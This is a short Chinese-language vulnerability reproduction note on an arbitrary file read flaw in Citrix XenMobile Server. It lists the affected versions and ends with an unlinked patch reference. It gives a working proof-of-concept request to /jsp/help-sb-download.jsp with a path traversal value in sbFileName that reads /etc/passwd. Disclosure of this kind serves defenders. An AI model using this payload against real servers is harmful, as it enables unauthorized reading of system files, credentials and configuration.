XenMobile介绍
XenMobile是Citrix开发的企业移动性管理软件。该产品允许企业管理员工的移动设备和移动应用程序。该软件的目的是通过允许员工安全地在企业拥有的和个人移动设备及应用程序上工作来提高生产率。
该漏洞允许远程未授权攻击者通过发送特制HTTP请求,可以读取服务器上的任意文件,如数据库配置信息,用户名密码等敏感文件。
漏洞影响版本
XenMobile Server < 10.12 RP2
XenMobile Server < 10.11 RP4
XenMobile Server < 10.10 RP6
XenMobile Server < 10.9 RP5
漏洞复现
POC:/jsp/help-sb-download.jsp?sbFileName=要读取的文件路径
访问控制台登录界面
将URL路径更改为POC路径这里查看/ect/passwd文件:
/jsp/help-sb-download.jsp?sbFileName=../../../ect/passwd
该服务器的/etc/passwd文件已经被下载下来。
修复方式
官方补丁下载地址点击跳转: